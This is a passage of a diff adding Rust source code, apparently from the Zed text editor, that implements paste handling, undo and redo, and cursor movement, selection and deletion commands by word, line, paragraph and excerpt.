clipboard_selections.push(ClipboardSelection { + len, + is_entire_line, + first_line_indent: buffer + .indent_size_for_line(MultiBufferRow(trimmed_range.start.row)) + .len, + }); + } + } + } + + cx.write_to_clipboard(ClipboardItem::new_string_with_json_metadata( + text, + clipboard_selections, + )); + } + + pub fn do_paste( + &mut self, + text: &String, + clipboard_selections: Option>, + handle_entire_lines: bool, + window: &mut Window, + cx: &mut Context, + ) { + if self.read_only(cx) { + return; + } + + let clipboard_text = Cow::Borrowed(text); + + self.transact(window, cx, |this, window, cx| { + if let Some(mut clipboard_selections) = clipboard_selections { + let old_selections = this.selections.all::(cx); + let all_selections_were_entire_line = + clipboard_selections.iter().all(|s| s.is_entire_line); + let first_selection_indent_column = + clipboard_selections.first().map(|s| s.first_line_indent); + if clipboard_selections.len() != old_selections.len() { + clipboard_selections.drain(..); + } + let cursor_offset = this.selections.last::(cx).head(); + let mut auto_indent_on_paste = true; + + this.buffer.update(cx, |buffer, cx| { + let snapshot = buffer.read(cx); + auto_indent_on_paste = snapshot + .language_settings_at(cursor_offset, cx) + .auto_indent_on_paste; + + let mut start_offset = 0; + let mut edits = Vec::new(); + let mut original_indent_columns = Vec::new(); + for (ix, selection) in old_selections.iter().enumerate() { + let to_insert; + let entire_line; + let original_indent_column; + if let Some(clipboard_selection) = clipboard_selections.get(ix) { + let end_offset = start_offset + clipboard_selection.len; + to_insert = &clipboard_text[start_offset..end_offset]; + entire_line = clipboard_selection.is_entire_line; + start_offset = end_offset + 1; + original_indent_column = Some(clipboard_selection.first_line_indent); + } else { + to_insert = clipboard_text.as_str(); + entire_line = all_selections_were_entire_line; + original_indent_column = first_selection_indent_column + } + + // If the corresponding selection was empty when this slice of the + // clipboard text was written, then the entire line containing the + // selection was copied. If this selection is also currently empty, + // then paste the line before the current line of the buffer. + let range = if selection.is_empty() && handle_entire_lines && entire_line { + let column = selection.start.to_point(&snapshot).column as usize; + let line_start = selection.start - column; + line_start..line_start + } else { + selection.range() + }; + + edits.push((range, to_insert)); + original_indent_columns.push(original_indent_column); + } + drop(snapshot); + + buffer.edit( + edits, + if auto_indent_on_paste { + Some(AutoindentMode::Block { + original_indent_columns, + }) + } else { + None + }, + cx, + ); + }); + + let selections = this.selections.all::(cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + } else { + this.insert(&clipboard_text, window, cx); + } + }); + } + + pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + if let Some(item) = cx.read_from_clipboard() { + let entries = item.entries(); + + match entries.first() { + // For now, we only support applying metadata if there's one string. In the future, we can incorporate all the selections + // of all the pasted entries. + Some(ClipboardEntry::String(clipboard_string)) if entries.len() == 1 => self + .do_paste( + clipboard_string.text(), + clipboard_string.metadata_json::>(), + true, + window, + cx, + ), + _ => self.do_paste(&item.text().unwrap_or_default(), None, true, window, cx), + } + } + } + + pub fn undo(&mut self, _: &Undo, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.undo(cx)) { + if let Some((selections, _)) = + self.selection_history.transaction(transaction_id).cloned() + { + self.change_selections(None, window, cx, |s| { + s.select_anchors(selections.to_vec()); + }); + } else { + log::error!( + "No entry in selection_history found for undo. \ + This may correspond to a bug where undo does not update the selection. \ + If this is occurring, please add details to \ + https://github.com/zed-industries/zed/issues/22692" + ); + } + self.request_autoscroll(Autoscroll::fit(), cx); + self.unmark_text(window, cx); + self.refresh_inline_completion(true, false, window, cx); + cx.emit(EditorEvent::Edited { transaction_id }); + cx.emit(EditorEvent::TransactionUndone { transaction_id }); + } + } + + pub fn redo(&mut self, _: &Redo, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.redo(cx)) { + if let Some((_, Some(selections))) = + self.selection_history.transaction(transaction_id).cloned() + { + self.change_selections(None, window, cx, |s| { + s.select_anchors(selections.to_vec()); + }); + } else { + log::error!( + "No entry in selection_history found for redo. \ + This may correspond to a bug where undo does not update the selection. \ + If this is occurring, please add details to \ + https://github.com/zed-industries/zed/issues/22692" + ); + } + self.request_autoscroll(Autoscroll::fit(), cx); + self.unmark_text(window, cx); + self.refresh_inline_completion(true, false, window, cx); + cx.emit(EditorEvent::Edited { transaction_id }); + } + } + + pub fn finalize_last_transaction(&mut self, cx: &mut Context) { + self.buffer + .update(cx, |buffer, cx| buffer.finalize_last_transaction(cx)); + } + + pub fn group_until_transaction(&mut self, tx_id: TransactionId, cx: &mut Context) { + self.buffer + .update(cx, |buffer, cx| buffer.group_until_transaction(tx_id, cx)); + } + + pub fn move_left(&mut self, _: &MoveLeft, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + let cursor = if selection.is_empty() { + movement::left(map, selection.start) + } else { + selection.start + }; + selection.collapse_to(cursor, SelectionGoal::None); + }); + }) + } + + pub fn select_left(&mut self, _: &SelectLeft, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| (movement::left(map, head), SelectionGoal::None)); + }) + } + + pub fn move_right(&mut self, _: &MoveRight, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + let cursor = if selection.is_empty() { + movement::right(map, selection.end) + } else { + selection.end + }; + selection.collapse_to(cursor, SelectionGoal::None) + }); + }) + } + + pub fn select_right(&mut self, _: &SelectRight, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| (movement::right(map, head), SelectionGoal::None)); + }) + } + + pub fn move_up(&mut self, _: &MoveUp, window: &mut Window, cx: &mut Context) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + let selection_count = self.selections.count(); + let first_selection = self.selections.first_anchor(); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::up( + map, + selection.start, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }); + + if selection_count == 1 && first_selection.range() == self.selections.first_anchor().range() + { + cx.propagate(); + } + } + + pub fn move_up_by_lines( + &mut self, + action: &MoveUpByLines, + window: &mut Window, + cx: &mut Context, + ) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::up_by_rows( + map, + selection.start, + action.lines, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }) + } + + pub fn move_down_by_lines( + &mut self, + action: &MoveDownByLines, + window: &mut Window, + cx: &mut Context, + ) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::down_by_rows( + map, + selection.start, + action.lines, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }) + } + + pub fn select_down_by_lines( + &mut self, + action: &SelectDownByLines, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::down_by_rows(map, head, action.lines, goal, false, text_layout_details) + }) + }) + } + + pub fn select_up_by_lines( + &mut self, + action: &SelectUpByLines, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::up_by_rows(map, head, action.lines, goal, false, text_layout_details) + }) + }) + } + + pub fn select_page_up( + &mut self, + _: &SelectPageUp, + window: &mut Window, + cx: &mut Context, + ) { + let Some(row_count) = self.visible_row_count() else { + return; + }; + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::up_by_rows(map, head, row_count, goal, false, text_layout_details) + }) + }) + } + + pub fn move_page_up( + &mut self, + action: &MovePageUp, + window: &mut Window, + cx: &mut Context, + ) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if self + .context_menu + .borrow_mut() + .as_mut() + .map(|menu| menu.select_first(self.completion_provider.as_deref(), cx)) + .unwrap_or(false) + { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + let Some(row_count) = self.visible_row_count() else { + return; + }; + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let autoscroll = if action.center_cursor { + Autoscroll::center() + } else { + Autoscroll::fit() + }; + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(autoscroll), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::up_by_rows( + map, + selection.end, + row_count, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }); + } + + pub fn select_up(&mut self, _: &SelectUp, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::up(map, head, goal, false, text_layout_details) + }) + }) + } + + pub fn move_down(&mut self, _: &MoveDown, window: &mut Window, cx: &mut Context) { + self.take_rename(true, window, cx); + + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + let selection_count = self.selections.count(); + let first_selection = self.selections.first_anchor(); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::down( + map, + selection.end, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }); + + if selection_count == 1 && first_selection.range() == self.selections.first_anchor().range() + { + cx.propagate(); + } + } + + pub fn select_page_down( + &mut self, + _: &SelectPageDown, + window: &mut Window, + cx: &mut Context, + ) { + let Some(row_count) = self.visible_row_count() else { + return; + }; + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::down_by_rows(map, head, row_count, goal, false, text_layout_details) + }) + }) + } + + pub fn move_page_down( + &mut self, + action: &MovePageDown, + window: &mut Window, + cx: &mut Context, + ) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if self + .context_menu + .borrow_mut() + .as_mut() + .map(|menu| menu.select_last(self.completion_provider.as_deref(), cx)) + .unwrap_or(false) + { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + let Some(row_count) = self.visible_row_count() else { + return; + }; + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let autoscroll = if action.center_cursor { + Autoscroll::center() + } else { + Autoscroll::fit() + }; + + let text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(autoscroll), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::down_by_rows( + map, + selection.end, + row_count, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }); + } + + pub fn select_down(&mut self, _: &SelectDown, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::down(map, head, goal, false, text_layout_details) + }) + }); + } + + pub fn context_menu_first( + &mut self, + _: &ContextMenuFirst, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { + context_menu.select_first(self.completion_provider.as_deref(), cx); + } + } + + pub fn context_menu_prev( + &mut self, + _: &ContextMenuPrevious, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { + context_menu.select_prev(self.completion_provider.as_deref(), cx); + } + } + + pub fn context_menu_next( + &mut self, + _: &ContextMenuNext, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { + context_menu.select_next(self.completion_provider.as_deref(), cx); + } + } + + pub fn context_menu_last( + &mut self, + _: &ContextMenuLast, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { + context_menu.select_last(self.completion_provider.as_deref(), cx); + } + } + + pub fn move_to_previous_word_start( + &mut self, + _: &MoveToPreviousWordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + ( + movement::previous_word_start(map, head), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_previous_subword_start( + &mut self, + _: &MoveToPreviousSubwordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + ( + movement::previous_subword_start(map, head), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_previous_word_start( + &mut self, + _: &SelectToPreviousWordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::previous_word_start(map, head), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_previous_subword_start( + &mut self, + _: &SelectToPreviousSubwordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::previous_subword_start(map, head), + SelectionGoal::None, + ) + }); + }) + } + + pub fn delete_to_previous_word_start( + &mut self, + action: &DeleteToPreviousWordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.select_autoclose_pair(window, cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = if action.ignore_newlines { + movement::previous_word_start(map, selection.head()) + } else { + movement::previous_word_start_or_newline(map, selection.head()) + }; + selection.set_head(cursor, SelectionGoal::None); + } + }); + }); + this.insert("", window, cx); + }); + } + + pub fn delete_to_previous_subword_start( + &mut self, + _: &DeleteToPreviousSubwordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.select_autoclose_pair(window, cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = movement::previous_subword_start(map, selection.head()); + selection.set_head(cursor, SelectionGoal::None); + } + }); + }); + this.insert("", window, cx); + }); + } + + pub fn move_to_next_word_end( + &mut self, + _: &MoveToNextWordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + (movement::next_word_end(map, head), SelectionGoal::None) + }); + }) + } + + pub fn move_to_next_subword_end( + &mut self, + _: &MoveToNextSubwordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + (movement::next_subword_end(map, head), SelectionGoal::None) + }); + }) + } + + pub fn select_to_next_word_end( + &mut self, + _: &SelectToNextWordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + (movement::next_word_end(map, head), SelectionGoal::None) + }); + }) + } + + pub fn select_to_next_subword_end( + &mut self, + _: &SelectToNextSubwordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + (movement::next_subword_end(map, head), SelectionGoal::None) + }); + }) + } + + pub fn delete_to_next_word_end( + &mut self, + action: &DeleteToNextWordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = if action.ignore_newlines { + movement::next_word_end(map, selection.head()) + } else { + movement::next_word_end_or_newline(map, selection.head()) + }; + selection.set_head(cursor, SelectionGoal::None); + } + }); + }); + this.insert("", window, cx); + }); + } + + pub fn delete_to_next_subword_end( + &mut self, + _: &DeleteToNextSubwordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = movement::next_subword_end(map, selection.head()); + selection.set_head(cursor, SelectionGoal::None); + } + }); + }); + this.insert("", window, cx); + }); + } + + pub fn move_to_beginning_of_line( + &mut self, + action: &MoveToBeginningOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + ( + movement::indented_line_beginning( + map, + head, + action.stop_at_soft_wraps, + action.stop_at_indent, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_beginning_of_line( + &mut self, + action: &SelectToBeginningOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::indented_line_beginning( + map, + head, + action.stop_at_soft_wraps, + action.stop_at_indent, + ), + SelectionGoal::None, + ) + }); + }); + } + + pub fn delete_to_beginning_of_line( + &mut self, + action: &DeleteToBeginningOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|_, selection| { + selection.reversed = true; + }); + }); + + this.select_to_beginning_of_line( + &SelectToBeginningOfLine { + stop_at_soft_wraps: false, + stop_at_indent: action.stop_at_indent, + }, + window, + cx, + ); + this.backspace(&Backspace, window, cx); + }); + } + + pub fn move_to_end_of_line( + &mut self, + action: &MoveToEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + ( + movement::line_end(map, head, action.stop_at_soft_wraps), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_end_of_line( + &mut self, + action: &SelectToEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::line_end(map, head, action.stop_at_soft_wraps), + SelectionGoal::None, + ) + }); + }) + } + + pub fn delete_to_end_of_line( + &mut self, + _: &DeleteToEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.select_to_end_of_line( + &SelectToEndOfLine { + stop_at_soft_wraps: false, + }, + window, + cx, + ); + this.delete(&Delete, window, cx); + }); + } + + pub fn cut_to_end_of_line( + &mut self, + _: &CutToEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.select_to_end_of_line( + &SelectToEndOfLine { + stop_at_soft_wraps: false, + }, + window, + cx, + ); + this.cut(&Cut, window, cx); + }); + } + + pub fn move_to_start_of_paragraph( + &mut self, + _: &MoveToStartOfParagraph, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::start_of_paragraph(map, selection.head(), 1), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_end_of_paragraph( + &mut self, + _: &MoveToEndOfParagraph, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::end_of_paragraph(map, selection.head(), 1), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_start_of_paragraph( + &mut self, + _: &SelectToStartOfParagraph, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::start_of_paragraph(map, head, 1), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_end_of_paragraph( + &mut self, + _: &SelectToEndOfParagraph, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::end_of_paragraph(map, head, 1), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_start_of_excerpt( + &mut self, + _: &MoveToStartOfExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::start_of_excerpt( + map, + selection.head(), + workspace::searchable::Direction::Prev, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_start_of_next_excerpt( + &mut self, + _: &MoveToStartOfNextExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::start_of_excerpt( + map, + selection.head(), + workspace::searchable::Direction::Next, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_end_of_excerpt( + &mut self, + _: &MoveToEndOfExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::end_of_excerpt( + map, + selection.head(), + workspace::searchable::Direction::Next, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_end_of_previous_excerpt( + &mut self, + _: &MoveToEndOfPreviousExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::end_of_excerpt( + map, + selection.head(), + workspace::searchable::Direction::Prev, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_start_of_excerpt( + &mut self, + _: &SelectToStartOfExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::start_of_excerpt(map, head, workspace::searchable::Direction::Prev), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_start_of_next_excerpt( + &mut self, + _: &SelectToStartOfNextExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::start_of_excerpt(map, head, workspace::searchable::Direction::Next), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_end_of_excerpt( + &mut self, + _: &SelectToEndOfExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::end_of_excerpt(map, head, workspace::searchable::Direction::Next), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_end_of_previous_excerpt( + &mut self, + _: &SelectToEndOfPreviousExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::end_of_excerpt(map, head, workspace::searchable::Direction::Prev), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_beginning( + &mut self, + _: &MoveToBeginning, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges(vec![0..0]); + }); + } + + pub fn select_to_beginning( + &mut self, + _: &SelectToBeginning, + window: &mut Window, + cx: &mut Context, + ) { + let mut selection = self.selections.last::(cx); + selection.set_head(Point::zero(), SelectionGoal::None); + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(vec![selection]); + }); + } + + pub fn move_to_end(&mut self, _: &MoveToEnd, window: &mut Window, cx: &mut Context) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let cursor = self.buffer.read(cx).read(cx).len(); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges(vec![cursor..cursor]) + }); + } + + pub fn set_nav_history(&mut self, nav_history: Option) { + self.nav_history = nav_history; + } + + pub fn nav_history(&self) -> Option<&ItemNavHistory> { + self.nav_history.as_ref() + } + + pub fn 